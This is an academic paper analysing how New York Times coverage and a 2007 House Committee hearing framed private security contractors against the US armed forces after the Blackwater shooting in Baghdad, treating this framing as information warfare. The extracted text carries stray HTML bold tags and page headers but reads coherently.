1. Introduction<br />
In the course of the war <strong>in</strong> Iraq, the American people were <strong>in</strong>troduced with private security contractors.<br />
Repeated pieces of news describ<strong>in</strong>g scandals <strong>in</strong> which PSCs and their employees entangled produced<br />
PSCs as participants <strong>in</strong> conflicts <strong>in</strong>to people’s shared understand<strong>in</strong>g. The fact that security contractors<br />
were ma<strong>in</strong>ly produced <strong>in</strong> the context of scandals framed them as primarily negative and avertable actors.<br />
However, at the same time another l<strong>in</strong>e of descriptions circulated <strong>in</strong> the discussion. Accord<strong>in</strong>g to this l<strong>in</strong>e,<br />
PSCs should be given credit from the work they do, and the protection they are provid<strong>in</strong>g to US state<br />
officials and dignitaries work<strong>in</strong>g or visit<strong>in</strong>g <strong>in</strong> Iraq should be recognised. Hence, PSCs and their<br />
employees should rather be seen positively as “[...] our team work<strong>in</strong>g <strong>in</strong> [...] a war zone (Turner, HCORG<br />
2007, 83)”.<br />
How the general American public perceives security contractors is important, because those perceptions<br />
create the space, as well as the limits of that space with<strong>in</strong> which political, adm<strong>in</strong>istrative and military<br />
decisions concern<strong>in</strong>g PSCs can be made. In an ideal, transparent democracy an illegitimate decision that<br />
would hold for long cannot be made and therefore, people’s perceptions and their accordance with the<br />
deliveries of public decision mak<strong>in</strong>g are valued. However, alongside f<strong>in</strong>e tun<strong>in</strong>g decisions to follow<br />
perceptions, people’s shared understand<strong>in</strong>g is an arena for power struggles over generally accepted or<br />
acceptable truths about PSCs. Simultaneously <strong>in</strong>formation warfare is the practice utilised to construct<br />
those truths and images the means for wag<strong>in</strong>g that war. This can be seen as an aspect of the war <strong>in</strong> Iraq<br />
<strong>in</strong> which warfare is understood as fight over the production of and control over images (Rantapelkonen<br />
2008, 65; 82).<br />
Fight<strong>in</strong>g over images of PSCs operat<strong>in</strong>g <strong>in</strong> Iraq <strong>in</strong>tensified after a shoot<strong>in</strong>g <strong>in</strong>cident <strong>in</strong> Baghdad on<br />
September 16 th , 2007. Recourse to violence by a team of PSC employees that lead to the kill<strong>in</strong>g of<br />
seventeen Iraqis served as an acceleration po<strong>in</strong>t for multiple <strong>in</strong>formation operations aimed at <strong>in</strong>fluenc<strong>in</strong>g<br />
the American public and thus, either at legitimis<strong>in</strong>g or outlaw<strong>in</strong>g the use of security contractors <strong>in</strong> conflict<br />
zones. In these operations, images of the state armed forces were used as a norm aga<strong>in</strong>st which PSCs’<br />
and their employees’ conduct was evaluated. The commonly suggested image of the armed forces was<br />
that of a patriotic and righteous state agency execut<strong>in</strong>g a policy that furthered American <strong>in</strong>terests abroad.<br />
In these descriptions soldiers were under direct state control and therefore, their actions could be trusted<br />
to be <strong>in</strong> the best <strong>in</strong>terest of the United States – unlike PSC actions seemed to be. The September 16 th<br />
323
Mirva Salm<strong>in</strong>en<br />
shoot<strong>in</strong>g and the discussion related to it became important because of the number of casualties, of strong<br />
Iraqi expressions of anger and of claims that similar PSC behaviour was frequent. Moreover, the <strong>in</strong>cident<br />
forced the US adm<strong>in</strong>istration to revise its contract<strong>in</strong>g and supervis<strong>in</strong>g practices and is still <strong>in</strong> the<br />
contemporary discussion often referred to. Thus, it can be argued that the shoot<strong>in</strong>g has importantly<br />
framed the overall discussion on private security contractors.<br />
As this paper does not exam<strong>in</strong>e the perceptions that the American people hold on PSCs, but <strong>in</strong>formation<br />
operations aimed at <strong>in</strong>fluenc<strong>in</strong>g those perceptions, it concentrates on study<strong>in</strong>g articles, columns and<br />
editorials published <strong>in</strong> The New York Times from September 18 th , 2007 to October 3 rd , 2007 as well as a<br />
discussion <strong>in</strong> the House Committee hear<strong>in</strong>g on PSCs which was widely commented on <strong>in</strong> the newspaper<br />
on the last day of the exam<strong>in</strong>ed time period. This data was selected because of the particular position<br />
given <strong>in</strong> the shared understand<strong>in</strong>g to news media as neutral speakers of truth. News media is not the<br />
only channel through which <strong>in</strong>formation is dissem<strong>in</strong>ated. However, <strong>in</strong>formation presented, for example, <strong>in</strong><br />
newspapers is believed to have gone through <strong>in</strong>tense processes of verification before publish<strong>in</strong>g and is<br />
hence read as true (Ridell 1994, 26-29) The New York Times particularly holds this k<strong>in</strong>d of appreciated<br />
position as an <strong>in</strong>formation funnel - not only <strong>in</strong> the United States, but more widely <strong>in</strong> the world. For similar<br />
reasons the congressional hear<strong>in</strong>g was <strong>in</strong>cluded <strong>in</strong> the data. Politicians <strong>in</strong> powerful positions do not only<br />
consist part of the people whose shared understand<strong>in</strong>g is <strong>in</strong>fluenced, but also act as <strong>in</strong>formation funnels.<br />
Due to their privileged position they are believed to have superior knowledge on important issues and<br />
therefore, what they say is worth report<strong>in</strong>g <strong>in</strong> itself. In this way, congressmen’s perceptions become<br />
repeated <strong>in</strong> media which <strong>in</strong>creases their truth value. (Kunelius et al. 2009 33-34, 315-326)<br />
2. Research and paper design<br />
Before go<strong>in</strong>g <strong>in</strong>to details about how the study of images and their use is conducted <strong>in</strong> the paper, some<br />
central concepts are <strong>in</strong> need of clarification. Firstly, <strong>in</strong>formation warfare is understood as a broad<br />
category of practices utilised to manage the flow of <strong>in</strong>formation - <strong>in</strong>clud<strong>in</strong>g the practices used to generate<br />
<strong>in</strong>formation as well as to degenerate and deprive <strong>in</strong>formation - and thus, to manage the emergence,<br />
existence and disappearance of different images from the shared understand<strong>in</strong>g (Rantapelkonen 2008,<br />
72; Foucault 2009, 42). In other words, <strong>in</strong>formation warfare is approached as a comb<strong>in</strong>ation of practices<br />
aimed at turn<strong>in</strong>g <strong>in</strong>formation <strong>in</strong>to knowledge and thus, constitut<strong>in</strong>g truths about private security<br />
contractors (see Huht<strong>in</strong>en & Rantapelkonen 2002 24-28). Secondly, what is meant with images are<br />
understand<strong>in</strong>gs produced by the use of discursive formations and pictures, and which are propagated as<br />
truths. Discursive formations, aga<strong>in</strong>, are systems of dispersion which separate and relate statements to<br />
one another <strong>in</strong>to mean<strong>in</strong>g produc<strong>in</strong>g sets, that is, images. They are recognisable through the succession<br />
and co-existence of statements <strong>in</strong> them as well as through <strong>in</strong>terven<strong>in</strong>g processes that change them. In<br />
other words, a certa<strong>in</strong> set of rules b<strong>in</strong>ds the production of images and create mean<strong>in</strong>gs <strong>in</strong> them. (Foucault<br />
2009, 37-41; 62-66.)<br />
This paper exam<strong>in</strong>es aforementioned images and the fight <strong>in</strong> which discussants position those images to<br />
each other. The exam<strong>in</strong>ation beg<strong>in</strong>s with recognis<strong>in</strong>g the discussants that have the right to attend the<br />
discussion about security contractors. Not everyone can be heard <strong>in</strong> the discussion, but only those who<br />
occupy an acknowledged speaker’s position can have their say. (Foucault 1998, 11.)<br />
The study then moves on to present<strong>in</strong>g imagery of both, the state armed forces and PSCs. Through close<br />
read<strong>in</strong>g of data typologies of images were produced. In this process, it soon became clear that regardless<br />
of whether the images of PSCs and their employees were negative or positive, they were relative to and<br />
dependent on the images of the armed forces. For the discussants PSCs do not have an <strong>in</strong>dependent<br />
existence, but they are to be def<strong>in</strong>ed <strong>in</strong> relation to the state armed forces. Even statements such as “[...]<br />
we are not talk<strong>in</strong>g about the military here at all [...] (Issa, HCOGR 2007, 86)” still require an image of the<br />
armed forces <strong>in</strong> order to be mean<strong>in</strong>gful. Pictures are seen as part of the discourse and either support<strong>in</strong>g<br />
or challeng<strong>in</strong>g the discursive descriptions (see Rose 2001, 136-138). Therefore, their analysis is tied to<br />
the analysis of verbal descriptions.<br />
The paper f<strong>in</strong>ishes with present<strong>in</strong>g observations about the durability of exam<strong>in</strong>ed images, the future of<br />
newspapers as <strong>in</strong>formation funnels which has been challenged by the rise of more participatory media<br />
and the solidity of the b<strong>in</strong>ary category <strong>in</strong> non-state-related discussions on PSCs.<br />
3. The discussants<br />
The speaker’s positions recognised <strong>in</strong> the newspaper and <strong>in</strong> the House Committee hear<strong>in</strong>g are similar.<br />
Plenty of audible room is given to the representatives of both, US and Iraqi governments and<br />
324
Mirva Salm<strong>in</strong>en<br />
adm<strong>in</strong>istrations. These discussants have been granted the authoritative right to comment on the<br />
September 16 th shoot<strong>in</strong>g, although their speaker’s positions are not similar. The US representatives, who<br />
represent the agencies us<strong>in</strong>g PSC services, are seen to have <strong>in</strong>side <strong>in</strong>formation and knowledge about<br />
contract<strong>in</strong>g and contractors. They are granted the authority to <strong>in</strong>form the American people about the<br />
shoot<strong>in</strong>g and its <strong>in</strong>vestigations. The Iraqi representatives, who speak for the people who are directly<br />
<strong>in</strong>fluenced by PSC actions, are given the role of representatives of the victims who demand their rights.<br />
They can also provide <strong>in</strong>formation on the shoot<strong>in</strong>g and are allowed to br<strong>in</strong>g accusations of PSC<br />
misconduct onto the discussion agenda as well as to claim respect for Iraq’s self-imposition. (Salm<strong>in</strong>en<br />
2010, 82-83.)<br />
The New York Times itself acts as a discussant, when it publishes news articles, columns and editorials<br />
comment<strong>in</strong>g on the shoot<strong>in</strong>g and on the whole issue of private security contractors (Salm<strong>in</strong>en 2010, 24-<br />
25). More accurately, the newspaper’s reporters act as discussants. They have been granted their<br />
speaker’s positions as representatives of the media who have the right to <strong>in</strong>form people. Voices of the<br />
victims and bystander witnesses of alleged misconduct, both Iraqi and American, can also be heard <strong>in</strong><br />
the discussion. They may not directly attend the discussion, but can have their say <strong>in</strong> newspaper<br />
<strong>in</strong>terviews, <strong>in</strong>terviews conducted dur<strong>in</strong>g the compilation of governmental reports or <strong>in</strong> letters put <strong>in</strong> front of<br />
the House Committee hear<strong>in</strong>g as pieces of evidence. These victims and bystanders are given the right to<br />
speak because of their personal experiences of the contractors’ conduct. Experience can also serve as<br />
justification for an expert to be given floor <strong>in</strong> the discussion. Therefore, statements of numerous<br />
anonymous “contract<strong>in</strong>g officials” or “representatives of the contract<strong>in</strong>g <strong>in</strong>dustry” appear <strong>in</strong> the discussion.<br />
An expert can also ga<strong>in</strong> speaker’s position because of his long engagement <strong>in</strong> the study of warfare and<br />
conflicts or of governmental outsourc<strong>in</strong>g. (Salm<strong>in</strong>en 2010, 147.)<br />
A particular form of expert knowledge and speaker’s positions based on that knowledge are the positions<br />
hold by representatives of PSCs and of the state armed forces. Blackwater, the contractor <strong>in</strong>volved <strong>in</strong> the<br />
shoot<strong>in</strong>g, speaks primarily through its spokeswoman and statements released from the company’s<br />
headquarters, but when the company’s CEO was asked to perform <strong>in</strong> the House Committee hear<strong>in</strong>g his<br />
statements became prospective sources of truth as well. The CEO’s expertise was not acknowledged<br />
only because he was the CEO, but also because he was a former member of US Navy’s special<br />
operations force who after his military career had founded Blackwater. In the hear<strong>in</strong>g he was thanked for<br />
his military service and it was widely presumed that the experience he ga<strong>in</strong>ed <strong>in</strong> the armed forces had<br />
facilitated his later activities (Welch, HCOGR 2007, 108). In other words, the CEO’s credibility as a<br />
source of truth claims was dependent on his military experience. This is an example of practices through<br />
which the b<strong>in</strong>ary category, the armed forces – security contractors, has been established.<br />
The speaker’s position of members of the state armed forces is based on expertise that they have ga<strong>in</strong>ed<br />
while serv<strong>in</strong>g <strong>in</strong> the <strong>in</strong>stitution responsible for US military and security operations. The armed forces are<br />
believed to have best knowledge of the overall situation <strong>in</strong> Iraq as well as of the conduct of military-like<br />
security operations. Therefore, they are even expected to comment on PSC issues and listened very<br />
carefully when they do so. Even when it is recognised that the armed forces do not have tra<strong>in</strong><strong>in</strong>g or<br />
will<strong>in</strong>gness to take over tasks allocated to PSCs, they are demanded to do so or at least, to expand their<br />
control and oversight to PSCs work<strong>in</strong>g for all US state agencies (Watson, HCOGR 2007, 85‒86; NYT<br />
editorial, 01.10.2007). This is another example of how the aforementioned b<strong>in</strong>ary category is produced.<br />
4. Imagery of members of the state armed forces and of security contractor<br />
employees<br />
4.1 Typologies of discursive descriptions<br />
Descriptions given of members of the state armed forces <strong>in</strong> the data are straightforward. Soldiers fight<strong>in</strong>g<br />
for the United States, firstly, were <strong>in</strong> Iraq voluntarily and were mak<strong>in</strong>g great sacrifices. They were<br />
described as patriotic people, whose “[...] pay [did] not reflect their value, but [who did not] compla<strong>in</strong> [...]<br />
(Waxman, HCOGR 2007, 3)” and who without questions followed orders given to them. In these<br />
descriptions, soldiers may also die albeit the war is expected to be waged <strong>in</strong> a manner which optimises<br />
force protection. Secondly, the United States was acknowledged to “[...] have the best troops <strong>in</strong> the world<br />
(Waxman 2007, 2)”; capable of anyth<strong>in</strong>g, if they only had the right tra<strong>in</strong><strong>in</strong>g and equipment as well as<br />
enough personnel. This was accepted as an unquestionable fact <strong>in</strong> the discussion. In addition, they came<br />
from several ethnic and educational backgrounds which only enhanced their abilities (Platts, HCOGR<br />
2007, 83-84). Even Blackwater CEO agreed to this fact and declared his employees of be<strong>in</strong>g a<br />
325
Mirva Salm<strong>in</strong>en<br />
supplement to the US military by fill<strong>in</strong>g <strong>in</strong> “a specialty gap” (Pr<strong>in</strong>ce, HCOGR 2007, 85-86). In relation to<br />
this, thirdly, the state armed forces were acknowledged of not be<strong>in</strong>g capable or will<strong>in</strong>g to do everyth<strong>in</strong>g.<br />
Soldiers had not been tra<strong>in</strong>ed for everyth<strong>in</strong>g and it was not even mean<strong>in</strong>gful for them to perform all tasks.<br />
Fourthly, the US soldiers were described as be<strong>in</strong>g humane, that is, will<strong>in</strong>g to help the Iraqis and to take<br />
their concerns <strong>in</strong>to consideration (NYT 22.09.2007).<br />
Fifthly, members of the armed forces appeared <strong>in</strong> the roles of <strong>in</strong>cident <strong>in</strong>vestigators and of the highest<br />
security authorities <strong>in</strong> Iraq. What soldiers stated about circumstances and trajectories were accepted as<br />
true. Thus, there appears to be conflict over soldiers’ statements as well. The New York Times quoted<br />
negative statements about PSCs provided by members of the armed forces (NYT 28.09.2007b), as did<br />
the speakers <strong>in</strong> the House Committee hear<strong>in</strong>g (Waxman 2007, 73-74). In response, Blackwater CEO told<br />
<strong>in</strong> the hear<strong>in</strong>g a story about a colonel thank<strong>in</strong>g him for hav<strong>in</strong>g his employees <strong>in</strong> Iraq to safeguard soldiers’<br />
backs (Pr<strong>in</strong>ce 2007, 74). In relation to this, sixthly, the armed forces were seen as the agency which<br />
would have to take care of all tasks <strong>in</strong> conflict zones <strong>in</strong> case no other actor was available (NYT<br />
20.09.2007b). They functioned as the US backbone and therefore, their capabilities and resources should<br />
not be reduced due to outsourc<strong>in</strong>g of the state’s military and security related tasks. Moreover, it was<br />
suggested that the armed forces should perform PSCs’ tasks, because these tasks were <strong>in</strong>tegral to the<br />
overall operation <strong>in</strong> Iraq and to US foreign policy, and because there were procedures to keep members<br />
of the armed forces accountable and responsible - unlike PSCs (Tierney, HCOGR 2007, 79).<br />
As it can be seen from the descriptions above, images of the state armed forces are primarily positive.<br />
On the contrary, the dom<strong>in</strong>at<strong>in</strong>g images of PSCs and their employees are negative, although contested.<br />
As PSC images are more numerous and vary<strong>in</strong>g than those of the armed forces their prime types are<br />
presented <strong>in</strong> the follow<strong>in</strong>g table 1.<br />
Table 1: Prime types of discursive descriptions of private security contractors<br />
primarily negative images primarily positive images<br />
war profiteers private companies protectors<br />
a good deal<br />
secretive, murky bus<strong>in</strong>esses political pets<br />
representatives of USA part of the nation’s total force<br />
abusers of the armed forces patriots<br />
risks or dangers necessities<br />
entities above law<br />
reckless cowboys<br />
crim<strong>in</strong>als<br />
mercenaries<br />
entities under state control<br />
unqualified amateurs<br />
abusers of their employees<br />
enemies of the Iraqis<br />
civilians<br />
highly-tra<strong>in</strong>ed professionals<br />
The above presented typology is not exhaustive. Speakers often comb<strong>in</strong>ed statements that position<br />
PSCs to several of the aforementioned images, and hence provid<strong>in</strong>g a straightforward typology is<br />
impossible. Thus, the aforementioned images are relational and dependent on each other rather than<br />
exclude one another. In addition, sometimes positive sides of a negative image were recognised, for<br />
example, when it was negatively claimed that PSCs lure active members away from the state armed<br />
forces, it was also positively recognised that prior military experience enhanced the skills of PSC<br />
employees (Clay, HCOGR 2007, 82; NYT 20.09.2007b). On the other hand, negative sides of a positive<br />
image were recognised, when PSC were acknowledged of safeguard<strong>in</strong>g US representatives <strong>in</strong> conflict<br />
zones, but also said to endanger the lives of Iraqi bystanders (NYT 18.09.2007; 19.09.2007). Of the<br />
images listed <strong>in</strong> the central column of table 1, “private companies”, “representatives of USA” and<br />
“civilians” are not negative or positive per se, but depend<strong>in</strong>g on the context can be both. “Crim<strong>in</strong>als” and<br />
“mercenaries” are listed as sub-categories to “entities above law” and “political pets” are a special form of<br />
images of “secretive, murky bus<strong>in</strong>esses”.<br />
As said, quantitatively the ma<strong>in</strong> tone <strong>in</strong> the discursive descriptions was negative. PSCs were claimed to<br />
benefit disproportionally from the war thanks to their political connections. This also took place at the<br />
expense of their own employees, of the armed forces and of US taxpayers. In addition, political affiliations<br />
326
Mirva Salm<strong>in</strong>en<br />
enabled the US adm<strong>in</strong>istration to wage an unpopular war without the support of the American people,<br />
that is, undemocratically. (Kuc<strong>in</strong>ich, HCOGR 2007, 65-66; Yarmuth, HCOGR 2007, 88-89; NYT<br />
28.09.2007a.) In this way, the adm<strong>in</strong>istration was betray<strong>in</strong>g the pr<strong>in</strong>ciples on the basis of which the<br />
United States had been built and deteriorat<strong>in</strong>g the moral stance of the state (see Harle 2000, 81-83). In<br />
addition, and unlike the armed forces, PSCs were claimed to primarily serve the profit motive <strong>in</strong>stead of<br />
US <strong>in</strong>terests (Tierney 2007, 77).<br />
In counter-arguments, PSC employees were presented as proud and dedicated Americans who after<br />
hav<strong>in</strong>g served <strong>in</strong> the armed forces cont<strong>in</strong>ued their service while work<strong>in</strong>g for PSCs. PSCs, on their behalf,<br />
associated with the United States and could not operate aga<strong>in</strong>st US <strong>in</strong>terests due to exist<strong>in</strong>g legal<br />
restrictions. (Pr<strong>in</strong>ce 2007, 100.) In further counter-arguments, it was stated that a large proportion of PSC<br />
employees were not Americans and thus, amongst other th<strong>in</strong>gs, fulfilled the def<strong>in</strong>ition of mercenaries<br />
(Norton, HCOGR 2007, 118). Mercenary claims existed only <strong>in</strong> The New York Times columns and<br />
editorials, not <strong>in</strong> the news articles and <strong>in</strong> the House Committee hear<strong>in</strong>g the concept was referred to less<br />
than ten times. Unsurpris<strong>in</strong>gly, representatives of PSCs and of their customers fiercely denied the<br />
applicability of the mercenary claim.<br />
In the discussion, private security providers were often alleged to be risky or dangerous. There were<br />
numerous moral, economic, political, military and security concerns attached to them. Most importantly,<br />
PSCs were regarded of not be<strong>in</strong>g under any legislation – they had been exempted from the Iraqi law and<br />
neither the US civilian nor military law had been applied to them <strong>in</strong> practice. The preferred legislation to<br />
be expanded to PSCs and their employees was the US military legislation. (Krugman 28.09.2007; NYT<br />
20.09.2007b; 27.09.2007.) Not only concerned politicians and experts were of that op<strong>in</strong>ion, but<br />
representatives of PSCs as well. This, aga<strong>in</strong>, is one of the ways <strong>in</strong> which PSCs emerge <strong>in</strong> relation to the<br />
state armed forces. However, with regard to this claim some problems arose. Firstly, some of PSCs and<br />
their employees operated <strong>in</strong> the civilian capacity, not <strong>in</strong> the military one. It was asked, whether civilians<br />
could be held responsible under military jurisdiction. (McCollum, HCOGR 2007, 97.) Secondly,<br />
representatives of the Iraqi adm<strong>in</strong>istration preferred PSCs to be brought under Iraq’s legislation, which<br />
was opposed by the Americans (NYT 23.09.2007).<br />
PSCs and their employees were not only seen as be<strong>in</strong>g above law and behav<strong>in</strong>g accord<strong>in</strong>gly and thus,<br />
endanger<strong>in</strong>g <strong>in</strong>nocent Iraqi lives (NYT 19.09.2007; 20.09.2007a). They were also accused of not be<strong>in</strong>g<br />
properly screened or supervised. Along with the lawlessness claim, this was the ma<strong>in</strong> concern <strong>in</strong> the<br />
discussion and expressed <strong>in</strong> many several ways. The allegation was contested by statements that<br />
testified about strict <strong>in</strong>tra-company qualifications and those of the customer, that is, of the US state<br />
agencies (Davis 2007, 14; Pr<strong>in</strong>ce 2007, 94). In addition, PSCs and their employees were recognised of<br />
represent<strong>in</strong>g the United States to the Iraqi people and therefore, with their unprofessional and reckless<br />
conduct endanger<strong>in</strong>g the US foreign policy (NYT 27.09.2007). This claim was also presented <strong>in</strong> a positive<br />
light, when legitimisation was sought for contractors by recognis<strong>in</strong>g them as part of the overall US force <strong>in</strong><br />
Iraq. With their extensive experience and specialised skills PSC employees were contribut<strong>in</strong>g to the<br />
overall force.<br />
Regardless of the quantitative dom<strong>in</strong>ation of negative images, strong positive ones stood aga<strong>in</strong>st them.<br />
Some of these positive images have been presented above. In addition, PSCs were <strong>in</strong> the discussion<br />
presented as effective and efficient, even heroic protectors. None of their pr<strong>in</strong>cipals had been killed or<br />
seriously <strong>in</strong>jured <strong>in</strong> Iraq, while many PSC employees had lost their lives <strong>in</strong> their work (Shays, HCOGR<br />
2007, 68). Outsourced security services were also seen as a good deal for the US adm<strong>in</strong>istration,<br />
because <strong>in</strong> this way soldiers were released from do<strong>in</strong>g secondary tasks to fight the war and because<br />
PSCs were provid<strong>in</strong>g the secondary tasks <strong>in</strong> cost-efficient and flexible manner (Pr<strong>in</strong>ce 2007, 23-24).<br />
However, the latter claim was often challenged with accusations of over-bill<strong>in</strong>g (Duncan, HCOGR 2007,<br />
80; NYT 02.10.2007). The necessity of PSCs <strong>in</strong> conflict zones was also acknowledged <strong>in</strong> the discussion,<br />
when it was stated that the current US military and security operations could not be conducted without<br />
contractors. The prime counter-argument to this was that it was not a good policy to be dependent on<br />
contractors <strong>in</strong> military operations or <strong>in</strong> foreign policy. (NYT 24.09.2007; 03.10.2007a.)<br />
4.2 How are the descriptions supported with pictures?<br />
There are eight pictures directly attached to news articles published on The New York Times pages. Of<br />
these only one actually presents PSC employees (18.09.2007). It was published alongside the first news<br />
article present<strong>in</strong>g the shoot<strong>in</strong>g and thus, also visually <strong>in</strong>troduced private security providers to the readers<br />
of the newspaper. In the picture, two heavily armed men who are not wear<strong>in</strong>g uniforms move around an<br />
327
Mirva Salm<strong>in</strong>en<br />
armed vehicle. A third, similarly equipped man occupies the shooter’s position <strong>in</strong>side the vehicle. From<br />
the surround<strong>in</strong>gs it can be concluded that they are on a street <strong>in</strong>side housed quarters of some non-<br />
Western town. Visual similarities between appearances of the men and their equipment <strong>in</strong> the picture and<br />
those of soldiers are strik<strong>in</strong>g. No wonder that <strong>in</strong> the discussion it was claimed that the Iraqi people are not<br />
differentiat<strong>in</strong>g between US soldiers and PSC employees (Cumm<strong>in</strong>gs, HCOGR 2007, 61).<br />
In addition, there are four pictures of the <strong>in</strong>cident scene or pictures that present the consequences of the<br />
shoot<strong>in</strong>g (21.09.2007; 28.09.2007b; 03.10.2007b), two facial close-ups of Blackwater CEO (27.09.2007;<br />
03.10.2007a) and a picture of Iraq’s prime m<strong>in</strong>ister speak<strong>in</strong>g while stand<strong>in</strong>g next to a flag of Iraq<br />
(24.09.2007). The <strong>in</strong>cident scene pictures are used to visualise the course of events on September 16 th<br />
or to witness about the horrendous impact that the force used on that day had on its targets. In the latter<br />
case, the ma<strong>in</strong> role is given to a charred white car towards which Blackwater employees launched a<br />
series of fire. Pictures of Blackwater CEO are used to give a face to the company. In the shared<br />
understand<strong>in</strong>g, PSC is a relatively abstract entity, which becomes more tangible when it is personified to<br />
its CEO. Picture of the Iraqi prime m<strong>in</strong>ister is published next to a news article tell<strong>in</strong>g how the prime<br />
m<strong>in</strong>ister had claimed that PSCs challenge the sovereignty of Iraq and thus, it re<strong>in</strong>forces the message<br />
delivered <strong>in</strong> the article.<br />
5. Conclusion<br />
This paper has presented the discussants allowed to attend discussion on private security contractors on<br />
the pages of The New York Times and <strong>in</strong> the House Committee hear<strong>in</strong>g. It has also presented imageries<br />
of the state armed forces and of PSCs which are utilised <strong>in</strong> the production of PSCs <strong>in</strong>to the American<br />
shared understand<strong>in</strong>g by establish<strong>in</strong>g a b<strong>in</strong>ary category with the armed forces. It has to be noted that<br />
most of the images presented here are not specific to the discussion about the September 16 th shoot<strong>in</strong>g,<br />
but existed before and have ma<strong>in</strong>ta<strong>in</strong>ed their existence thereafter. Neither they are specific to the<br />
medium exam<strong>in</strong>ed, but are present, for example, <strong>in</strong> academic texts, blogs as well as on discussion<br />
boards on <strong>in</strong>ternet. However, fram<strong>in</strong>g of the topic varies accord<strong>in</strong>g to the medium as does the acceptance<br />
of discussants, and more research on these matters is required.<br />
While the emergence of more participatory media has changed and keeps on chang<strong>in</strong>g knowledge<br />
production practices, newspapers and other news media are likely to preserve their position as<br />
<strong>in</strong>formation funnels. Topics and images rise onto discussion agenda from more varied sources than<br />
solely news reports and are kept there by a number of actors, which has made the successful conduct of<br />
<strong>in</strong>formation operations difficult. Practices of news media duplicate the suggested images and thus,<br />
<strong>in</strong>crease their truth value. This has <strong>in</strong>tensified power struggles over the production of knowledge on<br />
PSCs. Currently, there seems to be no unanimity on the images - just that security contractors need to be<br />
brought under better state supervision. In addition, it is improbable that the practice of produc<strong>in</strong>g PSCs<br />
<strong>in</strong>to the shared understand<strong>in</strong>g ma<strong>in</strong>ly through scandals changes regardless of the source of truth claims.<br />
With regard to private security contractors, one of the most successful practices used <strong>in</strong> <strong>in</strong>formation<br />
management has been the deprivation of <strong>in</strong>formation. As the discussion related to the September 16 th<br />
shoot<strong>in</strong>g testified, the US adm<strong>in</strong>istration has not been keep<strong>in</strong>g proper records PSCs and their operations,<br />
not to mention publish<strong>in</strong>g the records. It also required that security contractors absta<strong>in</strong> on public<br />
comment<strong>in</strong>g on <strong>in</strong>cidents. However, congressional and public demands for openness pressured the<br />
adm<strong>in</strong>istration to re-evaluate its practices and brought more <strong>in</strong>formation available. The ris<strong>in</strong>g awareness<br />
has also meant that PSCs are required to be better <strong>in</strong>cluded <strong>in</strong> decision mak<strong>in</strong>g. The b<strong>in</strong>ary category of<br />
the armed forces - private security contractors is likely to rema<strong>in</strong> strong <strong>in</strong> state related discussion on<br />
PSCs, but as state agencies are not the only customers of PSCs it would be <strong>in</strong>terest<strong>in</strong>g to test the solidity<br />
of the category <strong>in</strong> discussions on PSCs hired by, for example, private aid agencies or mult<strong>in</strong>ational<br />
corporations operat<strong>in</strong>g <strong>in</strong> conflict zones. However, f<strong>in</strong>d<strong>in</strong>g relevant <strong>in</strong>formation about these contracts is<br />
difficult.<br />
References<br />
Foucault, M. (1998) The Will to Knowledge. The History of Sexuality: Volume One, Pengu<strong>in</strong> Books, London.<br />
― (2009) The Archeology of Knowledge, Routledge, Ab<strong>in</strong>gdon.<br />
Harle, V. (2000) The Enemy with a Thousand Faces. The Tradition of the Other <strong>in</strong> Western Political Thought and<br />
History, Praeger, Westport.<br />
Huht<strong>in</strong>en, A. and Rantapelkonen, J. (2002) Image Wars. Beyond the Mask on Information Warfare, Marshal of<br />
F<strong>in</strong>land Mannerheim’s War Studies Fund, Saarijärvi.<br />
Kunelius, R.; Noppari, E. and Reunanen, E. (2009) Median vallan verkoissa. University of Tampere, Tampere.<br />
328
Mirva Salm<strong>in</strong>en<br />
Rantapelkonen, J. (2008) ”Informaatiosodan monet kasvot” <strong>in</strong> Raitasalo, J. and Sipilä, J. (eds.), Sota - Teoria ja<br />
todellisuus. Näkökulmia sodan muutokseen, F<strong>in</strong>nish National Defence University, Department of Strategic and<br />
Defence Studies, Hels<strong>in</strong>ki. Series 1:24, pp. 63-87.<br />
Ridell, S. (1994) Kaikki tiet vievät genreen: tutkimusretkiä tiedotusop<strong>in</strong> ja kirjallisuustieteen rajamaastossa. University<br />
of Tampere, Tampere.<br />
Rose, G. (2001) Visual Methodologies: An Introduction to the Interpretation of Visual Materials, Sage Publications<br />
Inc, London.<br />
Salm<strong>in</strong>en, M. (2010) Struggle over outsourc<strong>in</strong>g of the security functions of the state: The case of September 16, 2007<br />
shoot<strong>in</strong>g <strong>in</strong> Baghdad, M.Soc.Sc. thesis, University of Tampere, Tampere.<br />
The New York Times, news article: “U.S. Contractor Banned by Iraq over Shoot<strong>in</strong>gs”, 18.09.2007.<br />
The New York Times, news article:“U.S. Contractor Banned by Iraq over Shoot<strong>in</strong>gs”, 18.09.2007.<br />
The New York Times, news article: “Iraqi Report Says Guards for Blackwater Fired First”, 19.09.2007.<br />
The New York Times, news article: “Maliki Alleges 7 Cases When Blackwater Killed Iraqis”, 20.09.2007a.<br />
The New York Times, news article: “Armed Guards <strong>in</strong> Iraq Occupy a Legal Limbo”, 20.09.2007b.<br />
The New York Times, news article: “Guards’ Shots Not Provoked, Iraq Concludes”, 21.09.2007.<br />
The New York Times, news article: “Blackwater Resumes Guard<strong>in</strong>g U.S. Envoys <strong>in</strong> Iraq”, 22.09.2007.<br />
The New York Times, news article: “<strong>Security</strong> Firm Faces Crim<strong>in</strong>al Charges <strong>in</strong> Iraq”, 23.09.2007.<br />
The New York Times, news article: “Iraqi Premier Says Blackwater Shoot<strong>in</strong>gs Challenge His Nation’s Sovereignty”,<br />
24.09.2007.<br />
The New York Times, news article: “House Panel and State Dept. Clash on Blackwater Inquiry”, 26.09.2007a.<br />
The New York Times, news article: “Iraq Drafts Law on <strong>Security</strong> Companies”, 26.09.2006b.<br />
The New York Times, news article: “Blackwater Tops All Firms <strong>in</strong> Iraq <strong>in</strong> Shoot<strong>in</strong>g Rate”, 27.09.2007.<br />
The New York Times, news article: “State Dept. Tallies 56 Shoot<strong>in</strong>gs Involv<strong>in</strong>g Blackwater on Diplomatic Guard<br />
Duty”, 28.09.2007a.<br />
The New York Times, news article: “Blackwater Role <strong>in</strong> Shoot<strong>in</strong>g Said to Include Chaos”, 28.09.2007b.<br />
The New York Times, news article: “State Dept. Starts Third Review on Private <strong>Security</strong> <strong>in</strong> Iraq”, 29.09.2007.<br />
The New York Times, news article: “Report Says Firm Tried Cover-ups After Shoot<strong>in</strong>gs”, 02.10.2007.<br />
The New York Times, news article: “Chief of Blackwater Defends His Employees”, 03.10.2007a.<br />
The New York Times, news article: “From Errand to Fatal Shot to Hail of Fire to 17 Deaths”, 03.10.2007b.<br />
The New York Times, op-ed columnists<br />
